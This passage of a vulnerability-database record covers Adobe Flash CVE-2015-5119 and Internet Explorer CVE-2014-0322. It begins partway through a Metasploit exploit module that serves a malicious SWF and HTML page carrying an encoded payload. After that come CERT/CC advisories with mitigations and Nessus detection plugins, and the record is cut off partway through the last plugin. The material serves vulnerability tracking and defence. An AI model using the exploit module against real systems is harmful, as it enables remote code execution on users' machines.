public on its July 2015 data leak, was \ndescribed as an Use After Free while handling ByteArray objects. This module has \nbeen tested successfully on: \n \nWindows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194, \nWindows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194, \nWindows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, \nWindows 8.1 (32-bit), IE11 and Flash 17.0.0.169, and \nLinux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Unknown', # Someone from HackingTeam \n'juan vazquez', # msf module \n'sinn3r' # msf module \n], \n'References' => \n[ \n['CVE', '2015-5119'], \n['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-03.html'], \n['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/'], \n['URL', 'https://twitter.com/w3bd3vil/status/618168863708962816'] \n], \n'Payload' => \n{ \n'DisableNops' => true \n}, \n'Platform' => ['win', 'linux'], \n'Arch' => [ARCH_X86], \n'BrowserRequirements' => \n{ \n:source => /script|headers/i, \n:arch => ARCH_X86, \n:os_name => lambda do |os| \nos =~ OperatingSystems::Match::LINUX || \nos =~ OperatingSystems::Match::WINDOWS_7 || \nos =~ OperatingSystems::Match::WINDOWS_81 || \nos =~ OperatingSystems::Match::WINDOWS_VISTA || \nos =~ OperatingSystems::Match::WINDOWS_XP \nend, \n:ua_name => lambda do |ua| \ncase target.name \nwhen 'Windows' \nreturn true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF \nwhen 'Linux' \nreturn true if ua == Msf::HttpClients::FF \nend \n \nfalse \nend, \n:flash => lambda do |ver| \ncase target.name \nwhen 'Windows' \n# Note: Chrome might be vague about the version. \n# Instead of 18.0.0.203, it just says 18.0 \nreturn true if Gem::Version.new(ver) <= Gem::Version.new('18.0.0.194') \nwhen 'Linux' \nreturn true if ver =~ /^11\\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.468') \nend \n \nfalse \nend \n}, \n'Targets' => \n[ \n[ 'Windows', \n{ \n'Platform' => 'win' \n} \n], \n[ 'Linux', \n{ \n'Platform' => 'linux' \n} \n] \n], \n'Privileged' => false, \n'DisclosureDate' => 'Jul 06 2015', \n'DefaultTarget' => 0)) \nend \n \ndef exploit \n@swf = create_swf \n \nsuper \nend \n \ndef on_request_exploit(cli, request, target_info) \nprint_status(\"Request: #{request.uri}\") \n \nif request.uri =~ /\\.swf$/ \nprint_status('Sending SWF...') \nsend_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) \nreturn \nend \n \nprint_status('Sending HTML...') \nsend_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) \nend \n \ndef exploit_template(cli, target_info) \nswf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\" \ntarget_payload = get_payload(cli, target_info) \nb64_payload = Rex::Text.encode_base64(target_payload) \nos_name = target_info[:os_name] \n \nif target.name =~ /Windows/ \nplatform_id = 'win' \nelsif target.name =~ /Linux/ \nplatform_id = 'linux' \nend \n \nhtml_template = %Q|<html> \n<body> \n<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" /> \n<param name=\"movie\" value=\"<%=swf_random%>\" /> \n<param name=\"allowScriptAccess\" value=\"always\" /> \n<param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" /> \n<param name=\"Play\" value=\"true\" /> \n<embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/> \n</object> \n</body> \n</html> \n| \n \nreturn html_template, binding() \nend \n \ndef create_swf \npath = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-5119', 'msf.swf') \nswf = ::File.open(path, 'rb') { |f| swf = f.read } \n \nswf \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/132600/adobe_flash_hacking_team_uaf.rb.txt"}], "cert": [{"lastseen": "2020-09-18T20:41:41", "bulletinFamily": "info", "cvelist": ["CVE-2014-0322"], "description": "### Overview \n\nMicrosoft Internet Explorer contains a use-after-free vulnerability in the MSHTML CMarkup component, which can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nMicrosoft Internet Explorer contains a use-after-free vulnerability in the CMarkup component of the MSHTML library. This can allow for arbitrary code execution. We have confirmed Internet Explorer 10 to be vulnerable. It has been [reported](<http://arstechnica.com/security/2014/02/new-zero-day-bug-in-ie-10-exploited-in-active-malware-attack-ms-warns/>) that Internet Explorer 9 is also affected. Other versions of Internet Explorer may also be affected.\n\nNote that this vulnerability is being [exploited in the wild](<http://www.fireeye.com/blog/uncategorized/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html>), and the exploit code is publicly available. The exploit in the wild currently only targets Internet Explorer 10 on systems that have Adobe Flash installed and do **not** have EMET installed. Windows 8 comes with Flash, so no additional software is required to be vulnerable to this particular exploit on that platform. Although no Flash vulnerability appears to be at play here, the Internet Explorer vulnerability is used to corrupt Flash content in a way that allows ASLR to be bypassed via a memory address leak. This is made possible with Internet Explorer because Flash runs within the same process space as the browser. The Flash content uses this ASLR bypass to disable DEP and then execute code. The [Microsoft.XMLDOM ActiveX control is used to determine](<http://www.kb.cert.org/vuls/id/539289>) if EMET is installed on the target system. This is done by checking for the presence of `C:\\Windows\\AppPatch\\EMET.dll`. If this file is present, the exploit attempt is aborted. \n \n--- \n \n### Impact \n\nBy convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), an attacker may be able to execute arbitrary code. \n \n--- \n \n### Solution \n\n**Install the Microsoft Fix it** \n[Microsoft Security Advisory (2934088)](<http://technet.microsoft.com/en-us/security/advisory/2934088>) has been released to describe this issue. This advisory references a [Fix it](<http://blogs.technet.com/b/srd/archive/2014/02/19/fix-it-tool-available-to-block-internet-explorer-attacks-leveraging-cve-2014-0322.aspx>) utility to address this vulnerability. \n \nPlease also consider the following workarounds: \n \n--- \n \n**Use the Microsoft Enhanced Mitigation Experience Toolkit** \n \nThe [Microsoft Enhanced Mitigation Experience Toolkit](<http://support.microsoft.com/kb/2458544>) (EMET) can be used to help prevent exploitation of this vulnerability. CERT/CC has created a [video tutorial for setting up EMET 3.0](<http://www.youtube.com/watch?v=28_LUs_g0u4>) on Windows 7. Note that platforms that do not support ASLR, such as Windows XP and Windows Server 2003, will not receive the same level of protection that modern Windows platforms will. \n \n**Update to Internet Explorer 11** \n \nThe public exploit for this vulnerability does not work with Internet Explorer 11. \n \n--- \n \n### Vendor Information\n\n732479\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Microsoft Corporation Affected\n\nNotified: February 14, 2014 Updated: February 19, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://technet.microsoft.com/en-us/security/advisory/2934088>\n * <http://blogs.technet.com/b/srd/archive/2014/02/19/fix-it-tool-available-to-block-internet-explorer-attacks-leveraging-cve-2014-0322.aspx>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 9.5 | E:H/RL:W/RC:C \nEnvironmental | 9.5 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <http://technet.microsoft.com/en-us/security/advisory/2934088>\n * <http://blogs.technet.com/b/srd/archive/2014/02/19/fix-it-tool-available-to-block-internet-explorer-attacks-leveraging-cve-2014-0322.aspx>\n * <http://www.fireeye.com/blog/uncategorized/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html>\n * <http://community.websense.com/blogs/securitylabs/archive/2014/02/14/msie-0-day-exploit-cve-2014-0322-possibly-targeting-french-aerospace-organization.aspx>\n * <http://arstechnica.com/security/2014/02/new-zero-day-bug-in-ie-10-exploited-in-active-malware-attack-ms-warns/>\n * <http://www.seculert.com/blog/2014/02/0-day-attack-targets-aerospace-companys-remote-users.html>\n * <http://soroush.secproject.com/blog/2013/04/microsoft-xmldom-in-ie-can-divulge-information-of-local-drivenetwork-in-error-messages/>\n * <https://sites.google.com/site/zerodayresearch/smashing_the_heap_with_vector_Li.pdf>\n\n### Acknowledgements\n\nThis vulnerability was publicly reported by FireEye.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2014-0322](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-0322>) \n---|--- \n**Date Public:** | 2014-02-13 \n**Date First Published:** | 2014-02-14 \n**Date Last Updated: ** | 2014-02-20 01:47 UTC \n**Document Revision: ** | 47 \n", "modified": "2014-02-20T01:47:00", "published": "2014-02-14T00:00:00", "id": "VU:732479", "href": "https://www.kb.cert.org/vuls/id/732479", "type": "cert", "title": "Internet Explorer CMarkup use-after-free vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-18T20:43:56", "bulletinFamily": "info", "cvelist": ["CVE-2015-5119"], "description": "### Overview \n\nAdobe Flash Player contains a vulnerability in the ActionScript 3 ByteArray class, which can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nAdobe Flash Player versions 9.0 through version 18.0.0.194 contain a use-after-free vulnerability in the [AS3 ByteArray class](<http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/utils/ByteArray.html>). This can allow attacker-controlled memory corruption. Exploit code for this vulnerability is publicly available. \n \n--- \n \n### Impact \n\nAn attacker can execute arbitrary code in the context of the user running Flash Player. Attacks typically involve enticing a user to visit a web site containing specially-crafted Flash content, or to open a specially-crafted Microsoft Office document. \n \n--- \n \n### Solution \n\n**Apply an update**\n\nThis issue is addressed in Flash Player Desktop 18.0.0.203. Please see [Adobe Security Bulletin APSB15-16](<https://helpx.adobe.com/security/products/flash-player/apsb15-16.html>) for more details and fix versions for other platforms. \n \n--- \n \n**Do not run untrusted Flash content** \n \nTo defend against this and other, as yet unknown vulnerabilities, disable Flash in your browser or enable [Click-to-Play](<http://www.howtogeek.com/188059/how-to-enable-click-to-play-plugins-in-every-web-browser>) features. Adobe has also provided instructions for how to [uninstall Flash on Windows](<https://helpx.adobe.com/flash-player/kb/uninstall-flash-player-windows.html>) and [Mac](<https://helpx.adobe.com/flash-player/kb/uninstall-flash-player-mac-os.html>) platforms. \n \n**Use the Microsoft Enhanced Mitigation Experience Toolkit** \n \nThe [Microsoft Enhanced Mitigation Experience Toolkit](<http://www.microsoft.com/emet>) (EMET) can be used to help prevent exploitation of this vulnerability. In particular, Attack Surface Reduction (ASR) can be configured to help restrict Microsoft Office and Internet Explorer from loading the Flash ActiveX control. \n \n--- \n \n### Vendor Information\n\n561288\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Adobe Affected\n\nNotified: July 06, 2015 Updated: July 08, 2015 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://helpx.adobe.com/security/products/flash-player/apsb15-16.html>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P \nTemporal | 7.1 | E:H/RL:W/RC:C \nEnvironmental | 7.1 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://helpx.adobe.com/security/products/flash-player/apsb15-16.html>\n * <https://helpx.adobe.com/security/products/flash-player/apsa15-03.html>\n * <https://twitter.com/w3bd3vil/status/618168863708962816>\n * <http://malware.dontneedcoffee.com/2015/07/hackingteam-flash-0d-cve-2015-xxxx-and.html>\n * <http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/utils/ByteArray.html>\n * <http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/>\n * <http://www.microsoft.com/emet>\n\n### Acknowledgements\n\nThis vulnerability was discovered by HackingTeam.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2015-5119](<http://web.nvd.nist.gov/vuln/detail/CVE-2015-5119>) \n---|--- \n**Date Public:** | 2015-07-05 \n**Date First Published:** | 2015-07-07 \n**Date Last Updated: ** | 2015-07-11 18:39 UTC \n**Document Revision: ** | 38 \n", "modified": "2015-07-11T18:39:00", "published": "2015-07-07T00:00:00", "id": "VU:561288", "href": "https://www.kb.cert.org/vuls/id/561288", "type": "cert", "title": "Adobe Flash ActionScript 3 ByteArray use-after-free vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2017-10-29T13:37:32", "description": "The remote host is missing one of the workarounds referenced in KB 2934088. \n\nThe remote Internet Explorer install is affected by a use after free vulnerability in the MSHTML CMarkup component. By exploiting this flaw, a remote, unauthenticated attacker could execute arbitrary code on the remote host subject to the privileges of the user running the affected application.", "edition": 3, "published": "2014-02-20T00:00:00", "type": "nessus", "title": "MS KB2934088: Vulnerability in Internet Explorer Could Allow Remote Code Execution", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0322"], "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:ie"], "modified": "2017-08-30T00:00:00", "id": "SMB_KB2934088.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=72605", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# @DEPRECATED@\n#\n# Disabled on 2014/03/11. Deprecated by smb_nt_ms14-012.nasl\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72605);\n script_version(\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2017/08/30 19:28:47 $\");\n\n script_cve_id(\"CVE-2014-0322\");\n script_bugtraq_id(65551);\n script_osvdb_id(103354);\n script_xref(name:\"CERT\", value:\"732479\");\n script_xref(name:\"MSKB\", value:\"2934088\");\n\n script_name(english:\"MS KB2934088: Vulnerability in Internet Explorer Could Allow Remote Code Execution\");\n script_summary(english:\"Checks if workarounds referenced in KB article have been applied.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is missing one of the workarounds referenced in KB\n2934088. \n\nThe remote Internet Explorer install is affected by a use after free\nvulnerability in the MSHTML CMarkup component. By exploiting this flaw,\na remote, unauthenticated attacker could execute arbitrary code on the\nremote host subject to the privileges of the user running the affected\napplication.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/security/advisory/2934088\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Apply the IE settings workarounds suggested by Microsoft in the\nadvisory, or apply the MSHTML Shim workaround in the Microsoft\n'Fix it' solution.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:W/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2017 Tenable Network Security, Inc.\");\n\n script_dependencies(\"microsoft_emet_installed.nasl\", \"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\", \"SMB/IE/Version\");\n script_require_ports(139, 445);\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"This plugin has been deprecated. Use plugin #72930 (smb_nt_ms14-012.nasl) instead.\");\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude(\"smb_hotfixes.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\n# only IE 9 and 10 affected\nversion = get_kb_item_or_exit(\"SMB/IE/Version\");\nv = split(version, sep:\".\", keep:FALSE);\nif (int(v[0]) != 9 && int(v[0]) != 10) audit(AUDIT_INST_VER_NOT_VULN, \"IE\", version);\n\nregistry_init();\n\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\nsystemroot = hotfix_get_systemroot();\nif (!systemroot) audit(AUDIT_FN_FAIL, 'hotfix_get_systemroot');\n\nguid = '{25408f0a-987b-4ab0-a5ac-2ddb89ff22cf}';\npath = get_registry_value(handle:hklm, item:\"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB\\\" + guid);\nRegCloseKey(handle:hklm);\n\nif (isnull(path)) path = systemroot + \"\\AppPatch\\Custom\\\" + guid + '.sdb';\n\n# Now make sure the file is in place\nif (hotfix_file_exists(path:path))\n{\n hotfix_check_fversion_end();\n exit(0, \"The host is not affected since the Microsoft 'Fix it' has been applied.\");\n}\n\n# hotfix_file_exists calls NetUseDel(close:FALSE), so we must reconnect\nregistry_init();\n\nemet_info = '';\n\nemet_installed = FALSE;\nemet_with_ie = FALSE;\n\nif (!isnull(get_kb_item(\"SMB/Microsoft/EMET/Installed\")))\n emet_installed = TRUE;\n\n# Check if EMET is configured with IE.\n# The workaround does not specifically ask to enable DEP\n# but if IE is configured with EMET, dep is enabled by default.\n\nemet_list = get_kb_list(\"SMB/Microsoft/EMET/*\");\nif (!isnull(emet_list))\n{\n foreach entry (keys(emet_list))\n {\n if (\"iexplore.exe\" >< entry && \"/dep\" >< entry)\n {\n dep = get_kb_item(entry);\n if (!isnull(dep) && dep == 1)\n emet_with_ie = TRUE;\n }\n }\n}\n\nif (!emet_installed)\n{\n emet_info =\n '\\n Microsoft Enhanced Mitigation Experience Toolkit (EMET) is not' +\n '\\n installed.';\n}\nelse if (emet_installed)\n{\n if (!emet_with_ie)\n {\n emet_info =\n '\\n Microsoft Enhanced Mitigation Experience Toolkit (EMET) is' +\n '\\n installed, however Internet Explorer is not configured with EMET.';\n }\n}\n\ninfo_user_settings = '';\n\n# check mitigation per user\nhku = registry_hive_connect(hive:HKEY_USERS, exit_on_fail:TRUE);\nsubkeys = get_registry_subkeys(handle:hku, key:'');\n\nforeach key (subkeys)\n{\n if ('.DEFAULT' >< key || 'Classes' >< key ||\n key =~ \"^S-1-5-\\d{2}$\") # skip built-in accounts\n continue;\n\n mitigation = FALSE;\n\n# \"Set Internet and Local intranet security zone settings to \"High\" to block ActiveX Controls and Active Scripting in these zones\"\n key_part_intranet = '\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\1\\\\CurrentLevel';\n key_part_internet = '\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\3\\\\CurrentLevel';\n\n value = get_registry_value(handle:hku, item:key + key_part_intranet);\n value1 = get_registry_value(handle:hku, item:key + key_part_internet);\n\n if (isnull(value) && isnull(value1))\n continue;\n\n # 0x00012000 = 73728 = High Security\n if (!isnull(value) && !isnull(value1) &&\n value == 73728 && value1 == 73728)\n mitigation = TRUE;\n\n # \"Configure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone\"\n key_part_intranet = '\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\1\\\\1400';\n key_part_internet = '\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\3\\\\1400';\n\n value = get_registry_value(handle:hku, item:key + key_part_intranet);\n value1 = get_registry_value(handle:hku, item:key + key_part_internet);\n\n # 1 = prompt, 3 = disable\n if (!isnull(value) && !isnull(value1) &&\n (value == 1 || value == 3) && (value1 == 1 || value1 == 3))\n mitigation = TRUE;\n\n if (!mitigation)\n info_user_settings += '\\n ' + key + ' (Active Scripting Enabled)';\n}\n\nRegCloseKey(handle:hku);\n\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\n# check if user settings have been overridden by what is in HKLM\n# note: Security_HKLM_only can be set by group policy\nvalue = get_registry_value(handle:hklm, item:'SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Security_HKLM_only');\n\nif (info_user_settings != '' && !isnull(value) && value == 1)\n{\n mitigation = FALSE;\n\n# \"Set Internet and Local intranet security zone settings to \"High\" to block ActiveX Controls and Active Scripting in these zones\"\n key_part_intranet = 'SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\1\\\\CurrentLevel';\n key_part_internet = 'SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\3\\\\CurrentLevel';\n\n value = get_registry_value(handle:hklm, item:key_part_intranet);\n value1 = get_registry_value(handle:hklm, item:key_part_internet);\n\n # 0x00012000 = 73728 = High Security\n if (!isnull(value) && !isnull(value1) &&\n value == 73728 && value1 == 73728)\n mitigation = TRUE;\n\n # \"Configure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone\"\n key_part_intranet = 'SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\1\\\\1400';\n key_part_internet = 'SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\3\\\\1400';\n\n value = get_registry_value(handle:hklm, item:key_part_intranet);\n value1 = get_registry_value(handle:hklm, item:key_part_internet);\n\n # 1 = prompt, 3 = disable\n if (!isnull(value) && !isnull(value1) &&\n (value == 1 || value == 3) && (value1 == 1 || value1 == 3))\n mitigation = TRUE;\n\n if (mitigation)\n info_user_settings = '';\n}\n\nRegCloseKey(handle:hklm);\n\nclose_registry();\n\nif (info_user_settings != '')\n{\n port = kb_smb_transport();\n\n if (report_verbosity > 0)\n {\n if (emet_info != '')\n report =\n '\\n The remote host is missing the MSHTML Shim workaround and the' +\n '\\n following users have vulnerable IE settings :' + info_user_settings + '\\n' + emet_info + '\\n';\n else\n report =\n '\\n The remote host is missing the MSHTML Shim workaround and the' +\n '\\n following users have vulnerable IE settings :' + info_user_settings + '\\n';\n\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse exit(0, \"The host is not affected since a workaround has been applied.\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-01-07T10:41:11", "description": "Adobe reports :\n\nAdobe has released security updates for Adobe Flash Player. These\nupdates address critical vulnerabilities that could potentially allow\nan attacker to take control of the affected system. Adobe is aware of\na report that an exploit targeting CVE-2015-5119 has been publicly\npublished.", "edition": 22, "published": "2015-07-09T00:00:00", "title": "FreeBSD : Adobe Flash Player -- critical vulnerabilities (348bfa69-25a2-11e5-ade1-0011d823eebd) (Underminer)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5119"], "modified": "2015-07-09T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin", "p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin"], "id": "FREEBSD_PKG_348BFA6925A211E5ADE10011D823EEBD.NASL", "href": "https://www.tenable.com/plugins/nessus/84628", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84628);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-5119\");\n\n script_name(english:\"FreeBSD : Adobe Flash Player -- critical vulnerabilities (348bfa69-25a2-11e5-ade1-0011d823eebd) (Underminer)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe reports :\n\nAdobe has released security updates for Adobe Flash Player. These\nupdates address critical vulnerabilities that could potentially allow\nan attacker to take control of the affected system. Adobe is aware of\na report that an exploit targeting CVE-2015-5119 has been publicly\npublished.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\"\n );\n # https://vuxml.freebsd.org/freebsd/348bfa69-25a2-11e5-ade1-0011d823eebd.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?639ba9ec\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", 